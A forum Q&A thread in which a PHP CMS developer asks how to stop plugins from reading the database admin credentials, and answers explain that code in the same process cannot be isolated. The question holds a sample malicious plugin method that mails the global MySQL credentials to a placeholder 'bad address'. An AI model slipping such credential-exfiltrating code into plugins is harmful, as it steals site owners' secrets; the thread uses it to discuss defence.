I have a question which is bounching in my mind since a long long time.
I’m on a CMS project and I really don’t know how to do this:
I want this cms to be mod-able by using a plugin system, nothing difficult until now.
Well, I now have this question how can i protect a variable/constant like mysql password of the admininstrator user?
For example, in the file settings.php i have
$mysql = array("user" => "admin"...);
How can I make a class not to read it?
A simple class (plugin) could do
class myplugin extends plugin_container {
function badfunction() {
mail("my bad address", "data stolen", $GLOBALS["mysql"]);
}
A simple plugin, in this way, can steal the user’s sensible datas. How can i fix this ?
You can’t really do this in PHP. You can put the varible in an object, make it private, but using Reflection, other code can get it as well. Hell, even if it couldn’t, there are still ways to get object’s internals when you shouldn’t, like
var_dump,debug_zval_dump, and more.I would suggest either:
Generally, when your code runs in some context (like in a PHP script) and you want to allow some module or plug-in to run in the same context, there is no way to hide anything. The plugin will have access to the same memory (all the variables), all open resources (database connections) and it will basically be indistinguishable from any other code in that context. The same applies to many other contexts, e.g. a native process running in an OS. Of course you can make it “harder” to get some variable or resource, but you can never ensure it can’t be accessed. Unless you run the other code in a different context (other process, virtualization, …).